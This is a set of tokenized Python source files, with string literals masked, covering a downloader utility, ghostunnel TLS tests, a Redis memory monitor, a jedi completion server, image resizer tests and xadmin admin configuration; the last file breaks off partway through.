<s> import os . path <EOL> import hashlib <EOL> import urllib <EOL> class Downloader : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def request ( url , params = None , on_complete = None ) : <EOL> """<STR_LIT>""" <EOL> params = params or { } <EOL> if params : <EOL> url += "<STR_LIT:?>" + urllib . parse . urlencode ( params ) <EOL> return Downloader . download ( url , on_complete = on_complete ) <EOL> @ staticmethod <EOL> def download ( url , checksum = None , on_complete = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if on_complete : <EOL> from . . threads import BackgroundThread <EOL> return BackgroundThread ( <EOL> func = Downloader . download , <EOL> args = [ url , checksum , None ] , <EOL> on_complete = on_complete <EOL> ) <EOL> else : <EOL> urllib . request . install_opener ( <EOL> urllib . request . build_opener ( urllib . request . ProxyHandler ( ) ) <EOL> ) <EOL> data = urllib . request . urlopen ( url ) . read ( ) <EOL> if checksum and hashlib . sha256 ( data ) . hexdigest ( ) != checksum : <EOL> return None <EOL> return data <EOL> except Exception as e : <EOL> raise e <EOL> @ staticmethod <EOL> def download_file ( url , path = None , checksum = None , on_complete = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if on_complete : <EOL> from . . threads import BackgroundThread <EOL> return BackgroundThread ( <EOL> func = Downloader . download_file , <EOL> args = [ url , path , checksum , None ] , <EOL> on_complete = on_complete <EOL> ) <EOL> else : <EOL> data = Downloader . download ( url ) <EOL> if checksum and hashlib . sha256 ( data ) . hexdigest ( ) != checksum : <EOL> return None <EOL> path = path or os . path . basename ( url ) <EOL> f = open ( path , "<STR_LIT:wb>" ) <EOL> f . write ( data ) <EOL> f . close ( ) <EOL> return os . path . exists ( path ) <EOL> except Exception as e : <EOL> raise e </s>
<s> from subprocess import Popen <EOL> from multiprocessing import Process <EOL> from test_common import * <EOL> import socket , ssl , time , random <EOL> def send_data ( i , p ) : <EOL> counter = <NUM_LIT:0> <EOL> while counter < <NUM_LIT:100> : <EOL> r = random . random ( ) <EOL> if r < <NUM_LIT> : <EOL> time . sleep ( r ) <EOL> continue <EOL> counter += <NUM_LIT:1> <EOL> if r < <NUM_LIT> : <EOL> p . validate_can_send_from_client ( "<STR_LIT>" , "<STR_LIT>" . format ( i , counter ) ) <EOL> else : <EOL> p . validate_can_send_from_server ( "<STR_LIT>" , "<STR_LIT>" . format ( i , counter ) ) <EOL> r = random . random ( ) <EOL> if r < <NUM_LIT:0.5> : <EOL> p . validate_closing_client_closes_server ( "<STR_LIT>" . format ( i ) ) <EOL> else : <EOL> p . validate_closing_server_closes_client ( "<STR_LIT>" . format ( i ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> ghostunnel = None <EOL> n_clients = <NUM_LIT:10> <EOL> try : <EOL> root = RootCert ( '<STR_LIT:root>' ) <EOL> root . create_signed_cert ( '<STR_LIT>' ) <EOL> for i in range ( <NUM_LIT:1> , n_clients ) : <EOL> root . create_signed_cert ( "<STR_LIT>" . format ( i ) ) <EOL> ghostunnel = run_ghostunnel ( [ '<STR_LIT>' , '<STR_LIT>' . format ( LOCALHOST ) , <EOL> '<STR_LIT>' . format ( LOCALHOST ) , '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( LOCALHOST , STATUS_PORT ) , <EOL> '<STR_LIT>' ] ) <EOL> proc = [ ] <EOL> for i in range ( <NUM_LIT:1> , n_clients ) : <EOL> pair = SocketPair ( TcpClient ( <NUM_LIT> ) , TlsServer ( "<STR_LIT>" . format ( i ) , '<STR_LIT:root>' , <NUM_LIT> ) ) <EOL> p = Process ( target = send_data , args = ( i , pair , ) ) <EOL> p . start ( ) <EOL> proc . append ( p ) <EOL> for p in proc : <EOL> p . join ( ) <EOL> print_ok ( "<STR_LIT:OK>" ) <EOL> finally : <EOL> terminate ( ghostunnel ) </s>
<s> from subprocess import Popen <EOL> from test_common import * <EOL> import socket , ssl , time , os , signal <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> ghostunnel = None <EOL> try : <EOL> root = RootCert ( '<STR_LIT:root>' ) <EOL> root . create_signed_cert ( '<STR_LIT>' ) <EOL> root . create_signed_cert ( '<STR_LIT>' ) <EOL> root . create_signed_cert ( '<STR_LIT>' ) <EOL> ghostunnel = run_ghostunnel ( [ '<STR_LIT>' , '<STR_LIT>' . format ( LOCALHOST ) , <EOL> '<STR_LIT>' . format ( LOCALHOST ) , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( LOCALHOST , STATUS_PORT ) ] ) <EOL> pair1 = SocketPair ( TlsClient ( '<STR_LIT>' , '<STR_LIT:root>' , <NUM_LIT> ) , TcpServer ( <NUM_LIT> ) ) <EOL> pair1 . validate_can_send_from_client ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> pair1 . validate_tunnel_ou ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> os . rename ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ghostunnel . send_signal ( signal . SIGUSR1 ) <EOL> TlsClient ( None , '<STR_LIT:root>' , STATUS_PORT ) . connect ( <NUM_LIT:20> , '<STR_LIT>' ) <EOL> print_ok ( "<STR_LIT>" ) <EOL> pair2 = SocketPair ( TlsClient ( '<STR_LIT>' , '<STR_LIT:root>' , <NUM_LIT> ) , TcpServer ( <NUM_LIT> ) ) <EOL> pair2 . validate_can_send_from_client ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> pair2 . validate_tunnel_ou ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> pair2 . cleanup ( ) <EOL> pair1 . validate_can_send_from_client ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> pair1 . cleanup ( ) <EOL> print_ok ( "<STR_LIT:OK>" ) <EOL> finally : <EOL> terminate ( ghostunnel ) </s>
<s> import redis <EOL> import time <EOL> def main ( ) : <EOL> r = redis . StrictRedis ( ) <EOL> curr_memory = prev_memory = r . info ( ) [ '<STR_LIT>' ] <EOL> while True : <EOL> if prev_memory != curr_memory : <EOL> print ( '<STR_LIT>' % ( ( curr_memory - prev_memory ) , curr_memory ) ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> prev_memory = curr_memory <EOL> curr_memory = r . info ( ) [ '<STR_LIT>' ] <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import os <EOL> import sys <EOL> import json <EOL> import logging <EOL> from optparse import OptionParser <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:..>' ) ) <EOL> import jedi <EOL> from jedi . api import NotFoundError <EOL> sys . path . pop ( <NUM_LIT:0> ) <EOL> is_funcargs_complete_enabled = True <EOL> auto_complete_function_params = '<STR_LIT>' <EOL> class JsonFormatter ( logging . Formatter ) : <EOL> def format ( self , record ) : <EOL> output = logging . Formatter . format ( self , record ) <EOL> data = { <EOL> '<STR_LIT>' : record . levelname . lower ( ) , <EOL> '<STR_LIT:content>' : output <EOL> } <EOL> record = json . dumps ( data ) <EOL> return record <EOL> def getLogger ( ) : <EOL> """<STR_LIT>""" <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> log . setLevel ( logging . DEBUG ) <EOL> formatter = JsonFormatter ( '<STR_LIT>' ) <EOL> hdlr = logging . StreamHandler ( sys . stderr ) <EOL> hdlr . setFormatter ( formatter ) <EOL> log . addHandler ( hdlr ) <EOL> return log <EOL> logger = getLogger ( ) <EOL> def write ( data ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( data , str ) : <EOL> data = json . dumps ( data ) <EOL> sys . stdout . write ( data ) <EOL> if not data . endswith ( '<STR_LIT:\n>' ) : <EOL> sys . stdout . write ( '<STR_LIT:\n>' ) <EOL> try : <EOL> sys . stdout . flush ( ) <EOL> except IOError : <EOL> sys . exit ( ) <EOL> def format_completion ( complete ) : <EOL> """<STR_LIT>""" <EOL> display , insert = complete . name + '<STR_LIT:\t>' + complete . type , complete . name <EOL> return display , insert <EOL> def get_function_parameters ( callDef ) : <EOL> """<STR_LIT>""" <EOL> if not callDef : <EOL> return [ ] <EOL> params = [ ] <EOL> for param in callDef . params : <EOL> if not param . name : <EOL> continue <EOL> cleaned_param = param . description . 
rstrip ( '<STR_LIT:U+002C>' ) <EOL> if '<STR_LIT:*>' in cleaned_param or cleaned_param in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> continue <EOL> params . append ( [ s . strip ( ) for s in cleaned_param . split ( '<STR_LIT:=>' ) ] ) <EOL> return params <EOL> class JediFacade : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , source , line , offset , filename = '<STR_LIT>' , encoding = '<STR_LIT:utf-8>' ) : <EOL> filename = filename or None <EOL> self . script = jedi . Script ( <EOL> source , int ( line ) , int ( offset ) , filename , encoding <EOL> ) <EOL> def get ( self , action ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return getattr ( self , '<STR_LIT>' + action ) ( ) <EOL> except : <EOL> logger . exception ( '<STR_LIT>' . format ( action ) ) <EOL> def get_goto ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _goto ( ) <EOL> def get_usages ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _usages ( ) <EOL> def get_funcargs ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _complete_call_assigments ( ) <EOL> def get_autocomplete ( self ) : <EOL> """<STR_LIT>""" <EOL> data = [ ] <EOL> try : <EOL> data . extend ( self . _parameters_for_completion ( ) ) <EOL> except : <EOL> logger . info ( "<STR_LIT>" ) <EOL> try : <EOL> data . extend ( self . _completion ( ) or [ ] ) <EOL> except : <EOL> logger . info ( "<STR_LIT>" ) <EOL> return data <EOL> def get_docstring ( self ) : <EOL> return self . _docstring ( ) <EOL> def get_signature ( self ) : <EOL> return self . _docstring ( signature = <NUM_LIT:1> ) <EOL> def _docstring ( self , signature = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> defs = self . script . goto_definitions ( ) <EOL> assert isinstance ( defs , list ) <EOL> if len ( defs ) > <NUM_LIT:0> : <EOL> if signature : <EOL> calltip_signature = defs [ <NUM_LIT:0> ] . docstring ( ) . split ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> return calltip_signature . replace ( '<STR_LIT:\n>' , '<STR_LIT:U+0020>' ) . 
replace ( '<STR_LIT>' , '<STR_LIT:=>' ) <EOL> else : <EOL> return defs [ <NUM_LIT:0> ] . docstring ( ) <EOL> def _parameters_for_completion ( self ) : <EOL> """<STR_LIT>""" <EOL> completions = [ ] <EOL> try : <EOL> in_call = self . script . call_signatures ( ) [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> in_call = None <EOL> parameters = get_function_parameters ( in_call ) <EOL> for parameter in parameters : <EOL> try : <EOL> name , value = parameter <EOL> except ValueError : <EOL> name = parameter [ <NUM_LIT:0> ] <EOL> value = None <EOL> if value is None : <EOL> completions . append ( ( name , '<STR_LIT>' % name ) ) <EOL> else : <EOL> completions . append ( ( name + '<STR_LIT:\t>' + value , <EOL> '<STR_LIT>' % ( name , value ) ) ) <EOL> return completions <EOL> def _completion ( self ) : <EOL> """<STR_LIT>""" <EOL> completions = self . script . completions ( ) <EOL> return [ format_completion ( complete ) for complete in completions ] <EOL> def _goto ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> definitions = self . script . goto_assignments ( ) <EOL> if all ( d . type == '<STR_LIT>' for d in definitions ) : <EOL> definitions = self . script . goto_definitions ( ) <EOL> except NotFoundError : <EOL> return <EOL> else : <EOL> return [ ( i . module_path , i . line , i . column + <NUM_LIT:1> ) <EOL> for i in definitions if not i . in_builtin_module ( ) ] <EOL> def _usages ( self ) : <EOL> """<STR_LIT>""" <EOL> usages = self . script . usages ( ) <EOL> return [ ( i . module_path , i . line , i . column + <NUM_LIT:1> ) <EOL> for i in usages if not i . in_builtin_module ( ) ] <EOL> def _complete_call_assigments ( self ) : <EOL> """<STR_LIT>""" <EOL> completions = [ ] <EOL> complete_all = auto_complete_function_params == '<STR_LIT:all>' <EOL> try : <EOL> call_definition = self . script . 
call_signatures ( ) [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> call_definition = None <EOL> parameters = get_function_parameters ( call_definition ) <EOL> for index , parameter in enumerate ( parameters ) : <EOL> try : <EOL> name , value = parameter <EOL> except ValueError : <EOL> name = parameter [ <NUM_LIT:0> ] <EOL> value = None <EOL> if value is None : <EOL> completions . append ( '<STR_LIT>' % ( index + <NUM_LIT:1> , name ) ) <EOL> elif complete_all : <EOL> completions . append ( '<STR_LIT>' % ( name , index + <NUM_LIT:1> , value ) ) <EOL> return "<STR_LIT:U+002CU+0020>" . join ( completions ) <EOL> def process_line ( line ) : <EOL> data = json . loads ( line . strip ( ) ) <EOL> action_type = data [ '<STR_LIT:type>' ] <EOL> script = JediFacade ( <EOL> source = data [ '<STR_LIT:source>' ] , <EOL> line = data [ '<STR_LIT>' ] , <EOL> offset = data [ '<STR_LIT>' ] , <EOL> filename = data . get ( '<STR_LIT:filename>' , '<STR_LIT>' ) <EOL> ) <EOL> out_data = { <EOL> '<STR_LIT>' : data . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT:type>' : action_type , <EOL> action_type : script . get ( action_type ) <EOL> } <EOL> write ( out_data ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> parser = OptionParser ( ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> default = '<STR_LIT>' , <EOL> help = "<STR_LIT>" <EOL> ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> default = [ ] , <EOL> action = "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> default = '<STR_LIT:all>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> options , args = parser . parse_args ( ) <EOL> is_funcargs_complete_enabled = bool ( options . function_params ) <EOL> auto_complete_function_params = options . function_params <EOL> logger . info ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> options . 
extra_folders , <EOL> options . function_params , <EOL> ) <EOL> for extra_folder in options . extra_folders : <EOL> if extra_folder not in sys . path : <EOL> sys . path . insert ( <NUM_LIT:0> , extra_folder ) <EOL> for line in iter ( sys . stdin . readline , '<STR_LIT>' ) : <EOL> if line : <EOL> try : <EOL> process_line ( line ) <EOL> except Exception : <EOL> logger . exception ( '<STR_LIT>' ) </s>
<s> from pipeline . resizer import Resizer <EOL> import unittest <EOL> import hashlib <EOL> import os <EOL> import engine <EOL> class TestResizer ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . test_in = os . path . abspath ( <EOL> '<STR_LIT>' <EOL> ) <EOL> self . test_reference_crop = os . path . abspath ( <EOL> '<STR_LIT>' <EOL> ) <EOL> self . test_reference_resize = os . path . abspath ( <EOL> '<STR_LIT>' <EOL> ) <EOL> self . test_reference_resizecomp = os . path . abspath ( <EOL> '<STR_LIT>' <EOL> ) <EOL> def _load_image_as_str ( self , file ) : <EOL> return open ( file ) . read ( ) <EOL> def test_resize_crop ( self ) : <EOL> image = self . _load_image_as_str ( self . test_in ) <EOL> reference = self . _load_image_as_str ( self . test_reference_crop ) <EOL> reference_hash = hashlib . md5 ( reference ) . hexdigest ( ) <EOL> res = Resizer ( engine . BobRossEngine ( ) ) <EOL> out = res . _resize_using_pg ( image , <NUM_LIT:200> , <NUM_LIT:200> , '<STR_LIT>' ) <EOL> out_file = out [ <NUM_LIT:0> ] <EOL> out_file_hash = hashlib . md5 ( out_file ) . hexdigest ( ) <EOL> self . assertEqual ( out_file_hash , reference_hash ) <EOL> self . assertEqual ( out [ <NUM_LIT:1> ] , <NUM_LIT:200> ) <EOL> self . assertEqual ( out [ <NUM_LIT:2> ] , <NUM_LIT:200> ) <EOL> def test_resize_resize ( self ) : <EOL> image = self . _load_image_as_str ( self . test_in ) <EOL> reference = self . _load_image_as_str ( self . test_reference_resize ) <EOL> reference_hash = hashlib . md5 ( reference ) . hexdigest ( ) <EOL> res = Resizer ( engine . BobRossEngine ( ) ) <EOL> out = res . _resize_using_pg ( image , <NUM_LIT:200> , <NUM_LIT:200> , '<STR_LIT>' ) <EOL> out_file = out [ <NUM_LIT:0> ] <EOL> out_file_hash = hashlib . md5 ( out_file ) . hexdigest ( ) <EOL> self . assertEqual ( out_file_hash , reference_hash ) <EOL> self . assertEqual ( out [ <NUM_LIT:1> ] , <NUM_LIT:200> ) <EOL> self . 
assertEqual ( out [ <NUM_LIT:2> ] , <NUM_LIT> ) <EOL> def test_resize_resizecomp ( self ) : <EOL> image = self . _load_image_as_str ( self . test_in ) <EOL> reference = self . _load_image_as_str ( self . test_reference_resizecomp ) <EOL> reference_hash = hashlib . md5 ( reference ) . hexdigest ( ) <EOL> res = Resizer ( engine . BobRossEngine ( ) ) <EOL> out = res . _resize_using_pg ( image , <NUM_LIT:200> , <NUM_LIT:200> , '<STR_LIT>' ) <EOL> out_file = out [ <NUM_LIT:0> ] <EOL> out_file_hash = hashlib . md5 ( out_file ) . hexdigest ( ) <EOL> self . assertEqual ( out_file_hash , reference_hash ) <EOL> self . assertEqual ( out [ <NUM_LIT:1> ] , <NUM_LIT:200> ) <EOL> self . assertEqual ( out [ <NUM_LIT:2> ] , <NUM_LIT:200> ) </s>
<s> import xadmin <EOL> from xadmin import views <EOL> from models import IDC , Host , MaintainLog , HostGroup , AccessRecord <EOL> from xadmin . layout import Main , TabHolder , Tab , Fieldset , Row , Col , AppendedText , Side <EOL> from xadmin . plugins . inline import Inline <EOL> from xadmin . plugins . batch import BatchChangeAction <EOL> class MainDashboard ( object ) : <EOL> widgets = [ <EOL> [ <EOL> { "<STR_LIT:type>" : "<STR_LIT:html>" , "<STR_LIT:title>" : "<STR_LIT>" , "<STR_LIT:content>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:type>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:p>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT>' } } , <EOL> { "<STR_LIT:type>" : "<STR_LIT:list>" , "<STR_LIT>" : "<STR_LIT>" , '<STR_LIT>' : { <EOL> '<STR_LIT:o>' : '<STR_LIT>' } } , <EOL> ] , <EOL> [ <EOL> { "<STR_LIT:type>" : "<STR_LIT>" , "<STR_LIT:title>" : "<STR_LIT>" , "<STR_LIT>" : [ { '<STR_LIT>' : Host } , { '<STR_LIT>' : IDC } , { '<STR_LIT:title>' : "<STR_LIT>" , '<STR_LIT:url>' : "<STR_LIT>" } ] } , <EOL> { "<STR_LIT:type>" : "<STR_LIT>" , "<STR_LIT>" : MaintainLog } , <EOL> ] <EOL> ] <EOL> xadmin . sites . site . register ( views . website . IndexView , MainDashboard ) <EOL> class BaseSetting ( object ) : <EOL> enable_themes = True <EOL> use_bootswatch = True <EOL> xadmin . sites . site . register ( views . BaseAdminView , BaseSetting ) <EOL> class GlobalSetting ( object ) : <EOL> global_search_models = [ Host , IDC ] <EOL> global_models_icon = { <EOL> Host : '<STR_LIT>' , IDC : '<STR_LIT>' <EOL> } <EOL> menu_style = '<STR_LIT:default>' <EOL> xadmin . sites . site . register ( views . 
CommAdminView , GlobalSetting ) <EOL> class MaintainInline ( object ) : <EOL> model = MaintainLog <EOL> extra = <NUM_LIT:1> <EOL> style = '<STR_LIT>' <EOL> class IDCAdmin ( object ) : <EOL> list_display = ( '<STR_LIT:name>' , '<STR_LIT:description>' , '<STR_LIT>' ) <EOL> list_display_links = ( '<STR_LIT:name>' , ) <EOL> wizard_form_list = [ <EOL> ( '<STR_LIT>' , ( '<STR_LIT:name>' , '<STR_LIT:description>' ) ) , <EOL> ( '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:address>' ) ) , <EOL> ( '<STR_LIT>' , ( '<STR_LIT>' , ) ) <EOL> ] <EOL> search_fields = [ '<STR_LIT:name>' ] <EOL> relfield_style = '<STR_LIT>' <EOL> reversion_enable = True <EOL> actions = [ BatchChangeAction , ] <EOL> batch_fields = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> class HostAdmin ( object ) : <EOL> def open_web ( self , instance ) : <EOL> return "<STR_LIT>" % instance . ip <EOL> open_web . short_description = "<STR_LIT>" <EOL> open_web . allow_tags = True <EOL> open_web . is_column = True <EOL> list_display = ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:status>' , '<STR_LIT>' , '<STR_LIT:description>' ) <EOL> list_display_links = ( '<STR_LIT:name>' , ) <EOL> raw_id_fields = ( '<STR_LIT>' , ) <EOL> style_fields = { '<STR_LIT>' : "<STR_LIT>" } <EOL> search_fields = [ '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT:description>' ] <EOL> list_filter = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:status>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , ( '<STR_LIT>' , xadmin . filters . 
MultiSelectFieldListFilter ) ] <EOL> list_quick_filter = [ '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:10> } ] <EOL> list_bookmarks = [ { '<STR_LIT:title>' : "<STR_LIT>" , '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:2> } , '<STR_LIT>' : ( '<STR_LIT>' , ) , '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) } ] <EOL> show_detail_fields = ( '<STR_LIT>' , ) <EOL> list_editable = ( <EOL> '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:description>' ) <EOL> save_as = True <EOL> aggregate_fields = { "<STR_LIT>" : "<STR_LIT>" } <EOL> grid_layouts = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> form_layout = ( <EOL> Main ( <EOL> TabHolder ( <EOL> Tab ( '<STR_LIT>' , <EOL> Fieldset ( '<STR_LIT>' , <EOL> '<STR_LIT:name>' , '<STR_LIT>' , <EOL> description = "<STR_LIT>" <EOL> ) , <EOL> Inline ( MaintainLog ) , <EOL> ) , <EOL> Tab ( '<STR_LIT>' , <EOL> Fieldset ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> Row ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> Row ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> Row ( AppendedText ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) , AppendedText ( '<STR_LIT>' , "<STR_LIT>" ) ) , <EOL> '<STR_LIT>' <EOL> ) , <EOL> ) , <EOL> ) , <EOL> ) , <EOL> Side ( <EOL> Fieldset ( '<STR_LIT>' , <EOL> '<STR_LIT:status>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ) , <EOL> ) <EOL> ) <EOL> inlines = [ MaintainInline ] <EOL> reversion_enable = True <EOL> data_charts = { <EOL> "<STR_LIT>" : { '<STR_LIT:title>' : u"<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : ( "<STR_LIT>" , ) , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT> , '<STR_LIT>' : True } } , <EOL> "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT:count>" , "<STR_LIT>" : "<STR_LIT>" } , <EOL> } , <EOL> } , <EOL> } <EOL> class HostGroupAdmin ( object ) : <EOL> list_display = ( '<STR_LIT:name>' , '<STR_LIT:description>' ) <EOL> list_display_links = ( '<STR_LIT:name>' , ) <EOL> search_fields = [ '<STR_LIT:name>' ] <EOL> style_fields = { 
'<STR_LIT>' : '<STR_LIT>' } <EOL> class MaintainLogAdmin ( object ) : <EOL> list_display = ( <EOL> '<STR_LIT:host>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:time>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> list_display_links = ( '<STR_LIT:host>' , ) <EOL> list_filter = [ '<STR_LIT:host>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:time>' , '<STR_LIT>' ] <EOL> search_fields = [ '<STR_LIT>' ] <EOL> form_layout = ( <EOL> Col ( "<STR_LIT>" , <EOL> Fieldset ( '<STR_LIT>' , <EOL> '<STR_LIT:time>' , '<STR_LIT>' , <EOL> css_class = '<STR_LIT>' <EOL> ) , <EOL> span = <NUM_LIT:9> , horizontal = True <EOL> ) , <EOL> Col ( "<STR_LIT>" , <EOL> Fieldset ( '<STR_LIT>' , <EOL> '<STR_LIT:host>' , '<STR_LIT>' <EOL> ) , <EOL> Fieldset ( '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' <EOL> ) , <EOL> span = <NUM_LIT:3> <EOL> ) <EOL> ) <EOL> reversion_enable = True <EOL> class AccessRecordAdmin ( object ) : <EOL> def avg_count ( self , instance ) : <EOL> return int ( instance . view_count / instance . user_count ) <EOL> avg_count . short_description = "<STR_LIT>" <EOL> avg_count . allow_tags = True <EOL> avg_count . 
is_column = True <EOL> list_display = ( '<STR_LIT:date>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> list_display_links = ( '<STR_LIT:date>' , ) <EOL> list_filter = [ '<STR_LIT:date>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> actions = None <EOL> aggregate_fields = { "<STR_LIT>" : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" } <EOL> refresh_times = ( <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:10> ) <EOL> data_charts = { <EOL> "<STR_LIT>" : { '<STR_LIT:title>' : u"<STR_LIT>" , "<STR_LIT>" : "<STR_LIT:date>" , "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" ) , "<STR_LIT>" : ( '<STR_LIT:date>' , ) } , <EOL> "<STR_LIT>" : { '<STR_LIT:title>' : u"<STR_LIT>" , "<STR_LIT>" : "<STR_LIT:date>" , "<STR_LIT>" : ( '<STR_LIT>' , ) , "<STR_LIT>" : ( '<STR_LIT:date>' , ) } , <EOL> "<STR_LIT>" : { '<STR_LIT:title>' : u"<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : ( "<STR_LIT>" , ) , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT> , '<STR_LIT>' : True } } , <EOL> "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } , <EOL> } , <EOL> } , <EOL> } <EOL> def _chart_month ( self , obj ) : <EOL> return obj . date . strftime ( "<STR_LIT>" ) <EOL> xadmin . sites . site . register ( Host , HostAdmin ) <EOL> xadmin . sites . site . register ( HostGroup , HostGroupAdmin ) <EOL> xadmin . sites . site . register ( MaintainLog , MaintainLogAdmin ) <EOL> xadmin . sites . site . register ( IDC , IDCAdmin ) <EOL> xadmin . sites . site . register ( AccessRecord , AccessRecordAdmin ) </s>
<s> PLUGINS = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def register_builtin_plugins ( site ) : <EOL> from importlib import import_module <EOL> from django . conf import settings <EOL> exclude_plugins = getattr ( settings , '<STR_LIT>' , [ ] ) <EOL> [ import_module ( '<STR_LIT>' % plugin ) for plugin in PLUGINS if plugin not in exclude_plugins ] </s>
<s> import urllib , httplib2 <EOL> from django . template import loader <EOL> from django . core . cache import cache <EOL> from django . utils . translation import ugettext as _ <EOL> from xadmin . sites import site <EOL> from xadmin . models import UserSettings <EOL> from xadmin . views import BaseAdminPlugin , BaseAdminView <EOL> from xadmin . util import static , json <EOL> THEME_CACHE_KEY = '<STR_LIT>' <EOL> class ThemePlugin ( BaseAdminPlugin ) : <EOL> enable_themes = False <EOL> user_themes = None <EOL> use_bootswatch = False <EOL> default_theme = static ( '<STR_LIT>' ) <EOL> bootstrap2_theme = static ( '<STR_LIT>' ) <EOL> def init_request ( self , * args , ** kwargs ) : <EOL> return self . enable_themes <EOL> def _get_theme ( self ) : <EOL> if self . user : <EOL> try : <EOL> return UserSettings . objects . get ( user = self . user , key = "<STR_LIT>" ) . value <EOL> except Exception : <EOL> pass <EOL> if '<STR_LIT>' in self . request . COOKIES : <EOL> return urllib . unquote ( self . request . COOKIES [ '<STR_LIT>' ] ) <EOL> return self . default_theme <EOL> def get_context ( self , context ) : <EOL> context [ '<STR_LIT>' ] = self . _get_theme ( ) <EOL> return context <EOL> def get_media ( self , media ) : <EOL> return media + self . vendor ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def block_top_navmenu ( self , context , nodes ) : <EOL> themes = [ { 